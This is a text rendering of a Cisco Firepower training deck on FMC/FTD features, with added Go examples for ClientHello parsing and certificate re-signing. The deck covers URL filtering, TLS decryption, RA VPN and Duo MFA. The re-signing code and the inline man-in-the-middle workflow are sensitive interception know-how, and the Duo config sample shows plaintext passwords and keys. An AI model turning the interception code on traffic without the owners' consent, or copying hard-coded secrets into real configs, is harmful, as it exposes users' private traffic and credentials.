• Supported Devices with Access Control Policy

Configuration - Sources

Action configuration is per Indicators, not for STIX source group

Configuration - Indicators

Publish = download to the FTD
Configuration - Observables

Set to Block or Monitor per observable
Incident Handling

• Incident Monitoring: flexible filtering, delete incident
Usability Improvements

Contextual Cross-Launch
Firepower Version 6.3

• Launch a query into a different product, from any relevant event or dashboard
Contextual Cross-Launch
Several tools included

Cisco tools included

Other integrations

Contextual Cross-Launch
Additional integration - Stealthwatch

• Add your own Contextual Cross-Launch: Analysis -> Advanced -> Contextual Cross-Launch
• Example for Cisco Stealthwatch:
Contextual Cross-Launch (For Your Reference)

Stealthwatch Cross-Launch Example
Contextual Cross-Launch
Additional integration - Tetration

• Add your own Contextual Cross-Launch: Analysis -> Advanced -> Contextual Cross-Launch
• Example for Tetration:
Contextual Cross-Launch (For Your Reference)

Tetration Cross-Launch Example
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4

• Identification of active rules and non-active rules across the system
• Identification of the “freshness” of a rule; “stale” rules can confidently be cleaned up
• Rule data has the following information:
  • Hit Count
  • First Hit Time
  • Last Hit Time
• Rule data is not cleared when a rule is modified
• Rule data is removed on deletion of the corresponding rule
• Rule data is preserved across Snort restarts, failover, and cluster role changes
Hit Counts for Access Control and Prefilter Rules
Firepower Version 6.4

Analyze Hit Counts

Hit Counts for Access Control and Prefilter Rules
Hit Count Dialog

Select a device
Fetch Current Hit Count
Hit Counts for Access Control and Prefilter Rules
Search and Filter Rules

Search and Filter Rules

Hit Counts for Access Control and Prefilter Rules
Clear Hit Count

Clear Hit Count

Light Theme (Experimental)
Firepower version 6.5

Pagination for Access Control and NAT Policies
Firepower Version 6.5

Increased to 1000

Access Policy Filtering
Firepower Version 6.5

• FMC 6.5 adds string search/filter across all or specific ACP columns (callouts: Only show matching entries; Search/Filter string)
• Powerful tool for managing multi-tenant policies with Insert new rule…
• Future releases will add more flexible multi-column matching constructs and save capabilities
Access Policy Filtering
Demo

Improved Object Management
Firepower Version 6.5

• Available for network and URL objects
• Shows where objects are used
  • Network or URL groups
  • ACLs
  • Policies
• Recursive object finder from Object Usage screen
• Provides links to policies
• Right click to View Objects… from any screen
• Will be extended in future releases
Object Usage
Demo

URL Filtering
Overview

• FTD allows URL Category and Reputation filtering functionality
• URL database that contains URL category and reputation information is downloaded daily by the FMC and distributed to managed devices
• Database lookups: Snort on devices loads the database and performs lookups in real-time on HTTP/HTTPS streams based on configured
• Cloud lookups are performed for URLs that are not found in the database
• Pre-6.5 URL Filtering feature uses Webroot/BrightCloud as data source
• From 6.5 release data is provided by Talos
Talos URL Filtering
Firepower Version 6.5

• URL Categories change from previous vendor -> Talos
• 109 total categories with a gradual guided migration from previous 84 categories
• URL Reputation name changes

Talos Reputation Score (-10 -> +10)   Old Score (0 -> 100)   Talos Reputation   Old Reputation
score <= -5.9                         10                     Untrusted          High risk
-5.9 < score <= -3.0                  30                     Questionable       Suspicious sites
-3.0 < score <= 0.1                   50                     Neutral            Benign sites with security risks
0.1 < score <= 6.0                    70                     Favorable          Benign sites
score > 6.0                           90                     Trusted            Well known
Talos URL Filtering (For Your Reference)
Firepower Version 6.5

• These changes affect Policies:
  • AC Policy -> Rule edit -> URLs
  • SSL Policy -> Rule edit -> Category
  • QoS Policy -> Rule Edit -> URLs
• Backend:
  • New daemon (beakerd)
  • New database format (uridb)
URL Backend - Databases
Firepower Version 6.5

• Talos publishes both Legacy (pre-6.5) and Native (6.5+) databases
• Three URI DB sizes that are stored at /var/sf/cloud_download/cisco/
  • Large (500MB), Medium (125MB), Small (33MB)
• FMC/FDM push a full update file every Sunday, partial updates daily
• Merging of part file into current full and making new full DB happens only on Firewall
• Every Sunday with new Full file for each Cisco DB, all previous files will be purged
• For all pre-6.5.0 devices Talos publishes two different DBs
  • legacy_20m (holds 20 million entries)
  • legacy_1m (holds 1 million entries)
Dispute URL categories and reputations
Analysis > Advanced > Lookup > URL

• New link for “Dispute URL categories and reputations” – links to Talos website
• The button shows up only when the cursor hovers over a particular entry
Dispute URL categories and reputations

• URL Filtering page under System > Integration > Cloud Services

Dispute URL categories and reputations

• New dispute option is also added when you right click on URL category and/or URL reputation under connection events
Dispute URL categories and reputations
Cloud Services

Submit a Web Reputation Ticket

Submit a Web Categorization Ticket

Transport Layer Security (TLS) Decryption

The Importance of TLS/SSL

• Google, Facebook, Twitter encrypting all traffic
• Google ranking influenced by using HTTPS
• Browser vendors aggressively pushing HTTPS, because HTTP =
  • Now, ~80 percent of all Firefox traffic is HTTPS
  • https://letsencrypt.org/stats/
• Problems with older TLS version leading to upgrade of servers to newer protocols and ciphers: Poodle, Freak, Beast, ….
TLS Decryption

• It works on any port, not just 443 and HTTPS:
  • SMTPS, IMAPS, POP3S, FTPS…
• Supported versions: SSL 3.0, TLS 1.0, 1.1, 1.2
• SSLv2: based on the config, block or block with reset or do not decrypt
• No SSH, Spdy, Quic
• For TLS 1.3: Downgrade service
• Certificate Revocation List, CRL is supported
• No additional SSL license is needed
• Understand impact of TLS Decryption

Diagram (processing pipeline, from data acquisition upward): Data acquisition -> Decrypt if TLS -> Packet, TCP stream processing -> App ID detection -> NGFW rules -> IPS rules
Hardware Acceleration

Firepower platform   4100 and 9300   2100   1000
From version         6.2.3           6.3    6.4/6.5 (1150)

• Default: ON, however you could switch OFF until version 6.4
  system support {ssl-hw-offload enable | ssl-hw-offload disable}
• Displays the current status of SSL hardware acceleration (the default state is 6.2.3: disabled, 6.3 and 6.4: enabled):
  system support ssl-hw-status
• From 6.4:
  • TLS crypto acceleration cannot be disabled
  • Support for TLS crypto acceleration on one FTD container instance on a Firepower 4100/9300 module/security engine; acceleration is disabled for other container instances, but enabled for native instances
Hardware Acceleration (For Your Reference)
Performance Numbers

1010: 150 Mbps | 1120: 700 Mbps | 1140: 1 Gbps | 1150: 1.4 Gbps
2110: 365 Mbps | 2120: 475 Mbps | 2130: 735 Mbps | 2140: 1.4 Gbps
4110: 4.5 Gbps | 4115: 6.5 Gbps | 4120: 7.1 Gbps | 4125: 8 Gbps | 4140: 7.3 Gbps | 4145: 10 Gbps | 4150: 7.5 Gbps
SM-24: 7.5 Gbps | SM-36: 8.5 Gbps | SM-40: 10 Gbps | SM-44: 10 Gbps | 3xSM-44: 25 Gbps | SM-48: 11 Gbps | SM-56: 12 Gbps | 3xSM-56: 28 Gbps

Throughput measured with 50% TLS 1.2 traffic with AES256-SHA with RSA 2048B key
TLS 1.2 Session Without TLS Decryption

Client -> Server: Client Hello (“I can speak TLS1.2 or less, cipher list, extensions”)
  Server Name Indication (SNI) extension: the client indicates which hostname it is attempting to connect to
Server -> Client: Server Hello / Certificate and key exchange / Server Hello Done (“I choose to speak: TLS1.2, AES256 and this is my cert”)
  Subject and Subject Alternate Names: fields in the Certificate that identify the server hostname (FQDNs)
Client -> Server: Client Key Exchange / Change Cipher Spec / Finished
Server -> Client: Change Cipher Spec / Finished
Both directions: app data (encrypted), for example, HTTP request

Cannot filter HTTP request and content, since it is encrypted
TLS 1.3

• Approved on March 21, 2018
• Several security and acceleration improvements
• Not safe, old ciphers were removed: SHA1, DES, MD5, ...
• “One-trip” and even “zero-trip” instead of “two-trip” (remembers connection), faster connection
  • Zero-trip: replay attack vulnerability
• Server certificate is also encrypted
• Browsers support (Chrome, Firefox,…)

Handshake shown on the slide:
Client -> Server: Client Hello, supported cipher suites, key share
Server -> Client: Server Hello / chosen cipher suite / key share, Certificate & signature, Finished
Client -> Server: Finished, HTTP GET
Server -> Client: HTTP Answer
TLS 1.3 Downgrade
Undecryptable Action is taken

• Default: “True”, Switch ON/OFF (after consulting with Cisco TAC):
  system support ssl-client-hello-enabled aggressive-tls13_downgrade <false/true>
• You must restart snort before this change will take effect; this can be done via the CLI command:
  pmtool restartbytype DetectionEngine
• Show the status:
  system support ssl-client-hello-display
  extensions_remove=16,13172,43
  tls13_downgrade=true
• More information on FTD 6.3 and earlier versions:
  https://www.cisco.com/c/en/us/td/docs/security/firepower/SA/SW_Advisory_CSCvh22181.html
Client Hello and TLS 1.3

• Workaround: remove extension 43 (supported_versions, which advertises TLS 1.3 as version 0x0304) manually
  system support ssl-client-hello-tuning extensions_remove 43

Client Hello (screenshot): extension 43 carrying 0x0304 -> TLS 1.3
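What a TLS policy can see before any decryption (the SNI in the Client Hello above) and what the downgrade service acts on (extension 43), as an added Go example that is not part of the deck: a bounds-checked parser for a ClientHello record that extracts the SNI hostname and reports whether supported_versions offers TLS 1.3. The sample record is constructed, not captured.

```go
package main

import (
	"encoding/hex"
	"errors"
)

// TLS extension numbers (IANA); a client announces TLS 1.3 (0x0304) only in
// supported_versions (43), the extension the FTD downgrade service removes.
const (
	extServerName        = 0
	extSupportedVersions = 43
)

type ClientHello struct {
	LegacyVersion uint16
	CipherSuites  []uint16
	Extensions    map[uint16][]byte
}

// cursor reads length-prefixed fields with bounds checks; after the first overrun
// err stays set and every further read yields zero/nil.
type cursor struct {
	b   []byte
	pos int
	err error
}

func (c *cursor) take(n int) []byte {
	if c.err != nil || c.pos+n > len(c.b) {
		c.err = errors.New("truncated ClientHello")
		return nil
	}
	c.pos += n
	return c.b[c.pos-n : c.pos]
}

// num reads an n-byte big-endian integer (n is 1 or 2 in a ClientHello).
func (c *cursor) num(n int) int {
	v := 0
	for _, x := range c.take(n) {
		v = v<<8 | int(x)
	}
	return v
}

// ParseClientHello decodes a TLS record (type 0x16) carrying a ClientHello (type 0x01).
func ParseClientHello(rec []byte) (*ClientHello, error) {
	if len(rec) < 9 || rec[0] != 0x16 || rec[5] != 0x01 {
		return nil, errors.New("not a TLS handshake record carrying a ClientHello")
	}
	c := &cursor{b: rec, pos: 9}
	h := &ClientHello{LegacyVersion: uint16(c.num(2)), Extensions: map[uint16][]byte{}}
	c.take(32)       // client random
	c.take(c.num(1)) // legacy session id
	for n := c.num(2) / 2; n > 0 && c.err == nil; n-- {
		h.CipherSuites = append(h.CipherSuites, uint16(c.num(2)))
	}
	c.take(c.num(1)) // compression methods
	if c.err == nil && c.pos < len(rec) { // the extensions block is optional
		n := c.num(2)
		for end := c.pos + n; c.err == nil && c.pos < end; {
			t := c.num(2)
			h.Extensions[uint16(t)] = c.take(c.num(2))
		}
	}
	return h, c.err
}

// SNI returns the host_name from the server_name extension ("" if absent).
func (h *ClientHello) SNI() string {
	d := h.Extensions[extServerName] // list length (2) | name_type (1) | length (2) | host_name
	if len(d) >= 5 && d[2] == 0 {
		if n := int(d[3])<<8 | int(d[4]); 5+n <= len(d) {
			return string(d[5 : 5+n])
		}
	}
	return ""
}

// OffersTLS13 reports whether supported_versions lists 0x0304; a ClientHello
// without that extension can be answered with TLS 1.2 at most.
func (h *ClientHello) OffersTLS13() bool {
	d := h.Extensions[extSupportedVersions] // list length (1) | versions (2 bytes each)
	for i := 1; i+2 <= len(d); i += 2 {
		if d[i] == 0x03 && d[i+1] == 0x04 {
			return true
		}
	}
	return false
}

// sampleClientHello is a constructed (not captured) ClientHello for
// www.example.com offering TLS 1.3 and 1.2; the 32-byte client random is all 0x11.
var sampleClientHello, _ = hex.DecodeString("1603010052" + "0100004e" + "0303" +
	"1111111111111111111111111111111111111111111111111111111111111111" +
	"00" + "00041301c02f" + "0100" + "0021" +
	"00000014001200000f7777772e6578616d706c652e636f6d" + // server_name: www.example.com
	"002b00050403040303") // supported_versions: TLS 1.3, TLS 1.2
```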
TLS Decryption
Configuration
TLS Policy Rule Actions

• Each rule can specify how to process the matching TLS traffic:
• Decrypt using known certificate and key (for traffic destined to internal server)
• Decrypt using certificate re-sign (for outgoing traffic)
• Do-not-decrypt and Block/Block with Reset

Inspection with “Known Key” TLS Decryption

• DHE and ECDHE cannot be supported since traffic must be modified, industry protocol limitation
• “Trusted CA” should be listed in the TLS Decryption policy
• Add the known key and certificate to here: Object > Object management > PKI > Internal Certs

Diagram: Client – NGFW – Server; the FTD holds a copy of the Server key and certificate, so the encrypted stream (#$*) can be read as plaintext (ABC) at the NGFW
Inspection with “Known Key” TLS Decryption
Configuration

Action: Decrypt with Known Key
One of the known keys
Inspection with “Known Key” TLS Decryption
Monitoring

• Intrusion Event:
• Connection Event: No DHE nor ECDHE; Action: Block
Use Case: Defend Against Encrypted DejaBlue
https://blog.talosintelligence.com/2019/09/the-latest-on-bluekeep-and-dejablue.html

• BlueKeep, DejaBlue against CVE-2019-0708 RDP Server
• Add RDP Server’s Certificate to FMC > Objects > Internal Cert
• Configure decryption rule
• Filter for Snort ID 51369: "OS-WINDOWS Microsoft Windows RDP DecompressUnchopper integer overflow attempt."
• Click the checkbox and select Rule State -> Drop and Generate Events
• Result in the case of DejaBlue attack, IPS can protect: Dropped packets
Inspection for Outgoing Traffic

• It cannot inspect outgoing traffic in passive mode since it requires modifying (re-signing) the server cert

Diagram: Client – FTD – Server; the FTD uses a CA-generated key/certificate to resign a modified server certificate, so there are two separate encrypted sessions (#$* toward the client, >!? toward the server) with the plaintext (ABC) visible at the FTD; the client sees the Modified server cert, the server side keeps the Original server cert
TLS Decryption - Resign Method, Workflow

1. Create a certificate signing request on FMC (Objects->PKI-> Internal CAs, Generate CA, Generate CSR)
2. Issue the certificate
3. Install the certificate
4. Create “SSL Policy” and associate it with the Access Control Policy
5. Deploy Policy
6. Test
Intermediate CA Certificate

• A CA certificate that is issued by another CA
• It is signed by either another intermediate CA or by a root CA
• Intermediate CAs can sign server certificates in exactly the same way a root CA can
• Subject Type = CA
• Key Usage = Certificate Signing
• Issuer = the CA CN
Certificate Installation and Usage

• FTD needs an intermediate CA certificate to be installed for TLS decryption
  • Not a WEB SERVER CERTIFICATE, TAC will say thank you for this! ☺
• After receiving the HTTPS Request, FTD will fetch the server certificate from the destination
  • It will create a new certificate with (nearly) all the fields and sign this with its own CA certificate
  • CRL is not replicated because it would not match the “new” certificate
• Client needs to trust the certificate from FTD
  • Use a trusted Enterprise subordinate CA certificate or roll out your self-signed cert to the clients via GPO
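The resign step described above, as an added Go example using only the standard library (not the FTD's implementation): an enterprise root issues an intermediate CA for the firewall, the fetched server certificate is copied field by field (without its CRL distribution points) into a new leaf signed by that intermediate, and the chain is verified as a client with and without the root in its trust store. All names, keys and the CRL URL are constructed.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"math/big"
	"time"
)

func newKey() *ecdsa.PrivateKey {
	k, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) // cannot fail with crypto/rand
	return k
}

// sign issues tmpl for subjectKey under parent, signed with signerKey (parent == tmpl: self-signed).
func sign(tmpl, parent *x509.Certificate, subjectKey, signerKey *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &subjectKey.PublicKey, signerKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// caTemplate is a CA certificate as the slide describes it: Subject Type = CA,
// Key Usage = Certificate Signing.
func caTemplate(cn string, serial int64) *x509.Certificate {
	return &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}
}

// Resign is the decrypt-resign step: copy (nearly) all fields of the fetched
// server certificate into a new one signed by the intermediate CA on the FTD.
// CRL distribution points are not copied, and a plain web-server certificate is refused as signer.
func Resign(orig, ca *x509.Certificate, caKey, leafKey *ecdsa.PrivateKey) (*x509.Certificate, error) {
	if !ca.IsCA || ca.KeyUsage&x509.KeyUsageCertSign == 0 {
		return nil, errors.New("resigning certificate must be a CA certificate with certificate-signing key usage")
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(time.Now().UnixNano()), // unique per issuer; a real proxy keeps a counter
		Subject:      orig.Subject,
		DNSNames:     orig.DNSNames,
		NotBefore:    orig.NotBefore,
		NotAfter:     orig.NotAfter,
		ExtKeyUsage:  orig.ExtKeyUsage,
	}
	return sign(tmpl, ca, leafKey, caKey)
}

// BuildExample constructs an enterprise root, the FTD's intermediate CA signed by it,
// a self-signed origin certificate for host (standing in for the fetched one) and the resigned leaf.
func BuildExample(host string) (root, im, leaf, orig *x509.Certificate, err error) {
	rootKey, imKey, srvKey, leafKey := newKey(), newKey(), newKey(), newKey()
	rootT := caTemplate("Example Enterprise Root CA", 1)
	if root, err = sign(rootT, rootT, rootKey, rootKey); err != nil {
		return
	}
	if im, err = sign(caTemplate("FTD Decryption Intermediate CA", 2), root, imKey, rootKey); err != nil {
		return
	}
	srvT := &x509.Certificate{
		SerialNumber:          big.NewInt(4242),
		Subject:               pkix.Name{CommonName: host},
		DNSNames:              []string{host},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
		CRLDistributionPoints: []string{"http://crl.origin.example/server.crl"}, // placeholder URL
	}
	if orig, err = sign(srvT, srvT, srvKey, srvKey); err != nil {
		return
	}
	leaf, err = Resign(orig, im, imKey, leafKey)
	return
}

// ClientVerify validates the resigned chain the way a browser does: it only
// succeeds when the enterprise root is in the client's trust store.
func ClientVerify(root, im, leaf *x509.Certificate, host string, trustRoot bool) error {
	opts := x509.VerifyOptions{DNSName: host, Roots: x509.NewCertPool(), Intermediates: x509.NewCertPool()}
	if trustRoot {
		opts.Roots.AddCert(root)
	}
	opts.Intermediates.AddCert(im)
	_, err := leaf.Verify(opts)
	return err
}
```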
Inline TLS Decryption - Man in the Middle (MitM)

1. Client -> FTD: Client Hello
2. FTD -> Server: Proxied Client Hello
3. Server -> FTD: Server Hello / Certificate and key exchange / Server Hello Done
4. FTD -> Client: Server (proxy) Hello / Proxy Certificate and key exchange / Server (Proxy) Hello Done
5. Client -> FTD: Client Key Exchange / Change Cipher Spec / Finished
6. FTD -> Server: Client Key Exchange / Change Cipher Spec / Finished
7. Server -> FTD: Change Cipher Spec / Finished
8. FTD -> Client: Change Cipher Spec / Finished
9. Client -> FTD: HTTP Request (encrypted); FTD -> Server: HTTP Request (encrypted)
Inspect Outgoing Traffic

Action: Decrypt and Resign

It replaces the key ONLY in the Self-Signed Certificate, instead of the whole certificate; this causes the client browser to warn that the certificate is self-signed
Question:

• How could we control a domain in a policy? URL is encrypted, not visible yet!
• You can use the DN/CN of the cert: (CN != URL)
Conditions and Client and Server Hellos (For Your Reference)

SSL Rule Condition    Data Present In
Zones                 ClientHello
Networks              ClientHello
VLAN Tags             ClientHello
Ports                 ClientHello
Users                 ClientHello
Applications          ClientHello (Server Name Indicator extension)
Categories            ClientHello (Server Name Indicator extension)
Certificate           Server Certificate (potentially cached)
Distinguished Names   Server Certificate (potentially cached)
Certificate Status    Server Certificate (potentially cached)
Cipher Suites         ServerHello
Versions              ServerHello
Global TLS/SSL Rule Settings

• Configurable actions on these undecryptable cases:
  • TLS Compression
  • SSLv2
  • Unknown or unsupported Cipher Suite
  • Uncached session ID
  • Handshake or decryption error
• Default action could be:
  • Do not decrypt
  • Block
  • Block with reset
• Certain unsecure cipher suites are not supported when TLS hardware acceleration is enabled
• Field in Connection Events: Handshake error is a sign of TLS oversubscription
Trusted CA Certificates and CRL

• You reference that trusted CA object(s) in an SSL policy
• You can upload CRLs to a trusted CA object, supported formats: DER, PEM
• You can control encrypted traffic based on whether the CA subsequently revoked the certificate
• No limit to the number of CRLs
• Add CA who signed the CRL
TLS Decryption
Monitoring
Switch to Table view

Very useful;
Default = No TLS info

Recommendation, Best Practices

Recommendation: Decryption and Access Policies

• If you need to “DROP” a category in the access policies, good to also drop it in the TLS/SSL Decryption Policies
• HTTPS request is otherwise decrypted first and then matched against access policies
• This will give a performance gain

Diagram (processing pipeline, from data acquisition upward): Data acquisition -> Decrypt if TLS -> Packet, TCP stream processing -> App ID detection -> NGFW rules -> IPS rules
Block Page; End User Notification (EUN)

• From 6.1: The system now displays an HTTP response page for connections decrypted by the TLS policy, then blocked by access control rules
• However, the system does not display a response page for encrypted connections blocked by access control rules (or any other configuration)
• FTD cannot support EUN for bad certificates now
Recommendation: Block Weak Ciphers

Certain unsecure cipher suites are not supported when TLS hardware acceleration is enabled
Recommendation: Decrypt Uncategorized

Switch ON logging (Default: No logging)
Bad Certificate Handling – The Risk

Diagram: Client – FTD – Server; the FTD uses a CA-generated key/certificate to resign a modified server certificate, so the client receives a Modified server cert even when the server presented an Expired server cert
TLS Policy Rules

• Certificate status as a policy condition:
  • Revoked, self-signed, not yet valid, expired, invalid issuer, invalid signature, valid
  • If the certificate matches any of the selected statuses, the rule matches the traffic
• Cipher suite, TLS version as policy conditions
Block Certificate Issues

• Test with non trusted cert:

• Log:

You cannot decrypt everything

HTTP Strict Transport Security (HSTS) and MiTM

• HSTS is a web security policy mechanism which helps to protect websites against protocol downgrade (HTTPS->HTTP) and MiTM attacks
• Browser dependent
• Does not protect if you've never visited the website before

Users cannot click through warnings; automatically turn any http:// links into https:// links; if the secure connection cannot be assured (ex: self signed certificate is used), do not allow the user to override
Certificate Pinning

• Cert Pinning is the process of associating a host with their expected X.509 certificate(s) or public key, hard-code in the client/app the TLS/SSL cert(s) known to be used by server
• No rogue CA, example: google services from Chrome 13, mobile apps, twitter, box.com, ...
• Trust-On-First-Use (TOFU) mechanism able to detect and prevent MITM attacks

Diagram: Client – FTD – Server; the FTD resigns the server certificate with its CA-generated key/certificate, but a pinning client does not accept the Modified server cert
TLS Decryption - Summary

• Supported modes: transparent, routed, in-line set
• Passive and Inline TAP can only decrypt using “known key” modes
  • No Decrypt Resign, no Diffie-Hellman Ephemeral (DHE) and ECDHE ciphers
• FTD can decrypt TLS/SSL only
• For TLS 1.3: Downgrade service
• You cannot decrypt everything (cert pinning, HSTS, …)
• Decrypt-resign mode requires intermediate CA cert
• CRL management is critical
• Switch ON the TLS decryption log and info in the Connection Events
Break – 15 Minutes

Remote Access VPN (RA VPN)

Remote Access VPN - Use Case

• TLS/IPsec AnyConnect access
• Split Tunneling or Backhauling to handle traffic from remote users to Internet
• AMP/File and IPS inspection policies
• Application level inspection
• Easy Wizard to configure RA VPN

Diagram: remote user -> ISP / Internet -> Internet Edge (NGFW in HA) -> Private Network
Remote Access VPN Introduction

• FTD version 6.2.2 and later
• Cisco AnyConnect from 4.x
• RA VPN protocols:
  • Transport Layer Security (TLS)
  • Internet Key Exchange version 2 (IKEv2)
• Service and code came from ASA

Diagram: RA VPN on a Routed interface of the FTD, managed by FMC (FDM also can support RA VPN); it needs a Trustpoint/Cert, an XML profile, an IP pool, a RADIUS or LDAP server (optional, client cert can be used), an AnyConnect image, and a Smart License in the cloud: AnyConnect license (Plus, Apex, VPN-Only)
Supported RA VPN Features on FTD (For Your Reference)

• IPv4 & IPv6, all combinations
• Both FMC and FDM, device specific overrides
• Both FMC and FMC HA environments
• Multiple interfaces and multiple AAA servers
• From 6.3:
  • ISE posture, RADIUS CoA
  • RADIUS timeout (MFA with Duo)
• From 6.5:
  • Remote access VPN two-factor authentication using Duo LDAP
• AAA
  • Server authentication using self-signed or CA-signed identity certificates
  • AAA username and password-based remote authentication using RADIUS or LDAP/AD
  • RADIUS group and user authorization attributes, and RADIUS accounting
  • NGFW Access Control integration using VPN Identity
  • From 6.4: Secondary Authentication
• VPN Tunneling
  • Address assignment
  • Split tunneling
  • Split DNS
  • Client Firewall ACLs
  • Session Timeouts for maximum connect and idle time
• Monitoring
  • VPN Dashboard Widget
  • RA VPN events, including tunnel statistics available (CLI)
Currently (6.5) Unsupported Features on FTD (For Your Reference)

• Dynamic Access Policy
• Host Scan
• VPN load-balancer
• Local authentication (FDM can support it from 6.3)
• SCEP proxy
• LDAP attribute map
• WSA integration
• SAML SSO
• Browser Proxy
• AnyConnect customization
• AnyConnect scripts
• AnyConnect localization
• Per-app VPN
• TACACS, Kerberos (KCD Authentication and RSA SDI)
• Simultaneous IKEv2 dynamic crypto map for RA and L2L VPN
• AnyConnect modules (NAM, Hostscan, AMP Enabler etc.) – DART is installed by default
Pre-Configuration Before Remote Access VPN Wizard

RA VPN Components

• Access interfaces – determine interfaces to be used by RA VPN
  • SSL settings, such as access ports, IKEv2 settings such as certificate
• AnyConnect image – client package to be installed on the endpoint
• AnyConnect client profile – XML can be uploaded into the FMC as file object
  • Referenced in the group policy and downloaded to the endpoint while the VPN connection is initiating and includes parameters for the AnyConnect client
  • Profile Editor – stand-alone Windows tool
RA VPN Components (Cont.)

• Connection profiles – determine how authentication is performed
• Group policies – a set of user-oriented attribute/value pairs for RA VPN users
  • DNS/WINS, SSL/DTLS, timeouts, client bypass protocol and DHCP network scope
  • Split tunnel and split DNS configuration, VPN filter, egress VLAN and client firewall rules
  • AnyConnect client profile, SSL/DTLS settings and connection settings
Tasks Before the Remote Access VPN Wizard

1. Create a certificate used for server authentication (for production)
2. Configure RADIUS or LDAP server for user authentication (no local auth yet, optional, client cert is supported)
3. Create pool of addresses for VPN users (optional, wizard helps)
4. Create XML profile (optional, Profile Editor can be used)
5. Upload AnyConnect images for different platforms (optional, wizard helps)
Remote Access VPN Wizard

RA VPN Wizard
Pre-Configuration: “Before You Start”

• Devices > VPN > Remote Access > Add
RADIUS Server (like ISE) can change it with RADIUS CLASS attribute IETF-Class-25 (OU=group-policy-name)
“outside-zone” is a zone and FTD’s outside interface is a member

New in 6.3; earlier: configured ACL or “sysopt permit-vpn” command in FlexConfig
After Wizard Configuration
NAT For RA VPN Users

• Order matters:
  • No NAT towards RA VPN users
  • PAT for the rest of traffic

Diagram: RA VPN_address_pool on the outside, inside_subnet on the inside
Bypass Access Control Policy For RA VPN Users

• Bypass Access Control policy for decrypted traffic (sysopt permit-vpn) checkbox:
• If you check this checkbox, the VPN traffic into the internal network will bypass Snort
(no IPS, AMP and others)

Access Control Policy (ACL) For RA VPN Users
Optional from version 6.3

Diagram: RAVPN_address_pool on the outside; inside with inside_subnet
Profile Selection Options: Alias and Web Access URL

• User can select profile based on alias
• URL syntax:
  • https://<FTD-outside-IP>/alias
• Web Access URL points to the profile directly:
RA VPN Connection

• Open a browser, type DNS name or IP address pointing to the outside RA VPN
interface
• You will then have to login using credentials and follow instructions on the screen
• It will install AnyConnect and connect automatically

Group Policy Assignment From RADIUS Server

• ISE as a RADIUS Server can configure “Class” in Authorization Profile
• Monitor:
  • FMC: Analysis > Users > User Activity
  • FTD CLI:

ftd# sh vpn-sessiondb anyconnect
...
Bytes Tx : 48523 Bytes Rx : 23920
Group Policy : SecureGroupPolicy Tunnel Group : ISE-posture
FTD RA VPN with Duo Security Multi-Factor Authentication (MFA)

Duo Security Introduction

• Started as a multi-factor authentication (MFA) and later Zero Trust Security with device posture, adaptive authentication and SAML (Security Assertion Markup Language) support
• Policy decision point: cloud only
• 3 different methods for ASA RA VPN and FTD can support 2 methods from 6.3 (RADIUS proxy, LDAPs) now
• More information:
  • Application and User-centric Protection with Duo Security, BRKSEC-2382, Tuesday 11.00AM
FTD from 6.3 with Duo

Diagram (on premise): the FTD VPN talks RADIUS to the Duo RADIUS Proxy; the proxy performs primary authentication against an AD or RADIUS Server over LDAP/LDAPS or RADIUS, and reaches the Duo Cloud over TCP 443 for the secondary authentication
Duo RADIUS Proxy
A Standalone Duo Software Acting as a RADIUS Server

• Install on Windows or Linux using an admin account
• Config file: conf\authproxy.cfg
• Log file: log\authproxy.log

Primary authentication options:
1. AD account (LDAP/LDAPS), [ad_client] section; port 389, or 636 if using LDAPS
2. RADIUS, [radius_client] section; port typically 1812, but any unused port is acceptable

Secondary authentication: Duo account in the cloud ([radius_server_auto] section with ikey, skey and api_host)

FTD as a RADIUS client: radius_ip_1 and radius_secret_1

  [ad_client]
  host=<AD-IP-address>
  service_account_username=admin
  service_account_password=C1sco12345
  search_dn=CN=Users,DC=mydomain,DC=com

  [radius_server_auto]
  ikey=D94FBB987I8KUTK5556Z
  skey=F0E47ItOrET0c8jE7gxaxQcJnRb7VObjQc9rbOTw
  api_host=api-1506c3ct.duosecurity.com
  radius_ip_1=10.1.1.40
  radius_secret_1=C1sco12345
RADIUS Authentication Timeout
from FMC/FTD 6.3

Users need a longer timeout
FTD RA VPN with Duo Security Demo
FTD RA VPN with RADIUS Change of Authorization, CoA
FTD from 6.3 with RADIUS Change of Authorization, CoA

• AnyConnect client connects to FTD and ISE authenticates it
• ISE tells FTD to restrict access to limit communications to
  • Permit traffic to ISE for compliance checking
  • Permit traffic to remediation servers (AV servers, download hotfixes…)

[Diagram: the client’s Request is answered by ISE with Accept, dACL (Permit to ISE, Permit to Remediation, Deny any) and URL-redirect; the File Server and the Remediation Server sit behind FTD]
FTD from 6.3 with RADIUS Change of Authorization, CoA (Cont.)

• AnyConnect is redirected to ISE for compliance checking
• Client remediates if necessary (AV update, Hotfix, Program Launched)

[Diagram: the dACL is still Permit to ISE, Permit to Remediation, Deny any; the client reaches the Remediation Server while ISE keeps control of the session, the File Server stays unreachable]
FTD from 6.3 with RADIUS Change of Authorization, CoA (Cont.)

• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576) message which makes FTD apply new authorization (permit traffic to internal networks)

[Diagram: ISE sends CoA Policy Push with a new dACL, replacing the previous Permit to ISE, Permit to Remediation, Deny any]
FTD from 6.3 with RADIUS Change of Authorization, CoA (Cont.)

• When client is compliant, ISE sends Change of Authorization (CoA, RFC 3576) message which makes FTD apply new authorization (permit traffic to internal networks)

[Diagram: the dACL is now Permit to any and the client reaches the File Server]
URL Redirect ACL Configured on FMC (For Your Reference)

• Objects > Object Management > Access List > Extended

Negative logic:
  block == do not redirect
  permit == redirect
FMC: Add RADIUS CoA Server

• Objects > Object Management > RADIUS Server Group
